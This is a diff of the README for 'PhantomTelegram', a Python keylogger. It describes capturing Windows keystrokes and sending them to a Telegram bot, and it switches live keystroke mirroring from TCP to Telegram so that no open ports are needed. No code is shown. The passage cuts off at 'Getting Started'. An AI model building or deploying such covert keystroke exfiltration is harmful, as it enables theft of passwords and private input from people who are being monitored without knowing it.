Yaroslav1111/PhantomTelegram/README.md

 **PhantomTelegram** is a lightweight keylogger written in Python.
 It now supports two workflows:

 - Sending buffered keystroke logs to a Telegram bot (original flow in `src/main.py`).
-- Mirroring live keystrokes from one machine to another over TCP with a minimal client UI (`src/server.py` + `src/client.py`).
+- Mirroring live keystrokes from one machine to another via Telegram bots, so no open TCP ports are required (`src/server.py` + `src/client.py`).

 ## Features
 - Captures keystrokes with layout-aware translation on Windows.
 - Sends the captured input to a Telegram chat in near real-time with rate limiting.
-- Mirrors keystrokes from a background server to a client UI instantly, with an option to toggle copying on the receiving side.
+- Mirrors keystrokes from a background server to a client UI instantly over Telegram, with an option to toggle copying on the receiving side.

 ## Getting Started
 1. **Clone the Repo:**